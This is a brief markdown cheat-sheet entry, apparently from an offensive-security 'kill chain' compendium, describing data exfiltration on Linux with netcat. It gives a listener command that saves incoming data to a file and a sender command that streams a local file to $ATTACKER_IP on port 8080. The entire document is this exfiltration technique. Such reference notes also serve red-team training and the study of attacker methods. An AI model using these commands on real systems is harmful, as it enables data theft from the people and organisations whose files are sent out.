killchain-compendium/exfiltration/linux/nc.md

132 B

Netcat

  • RX
nc -lp 8080 > out.txt
  • TX
nc $ATTACKER_IP 8080 < in.txt
  • Have to be end manually after a while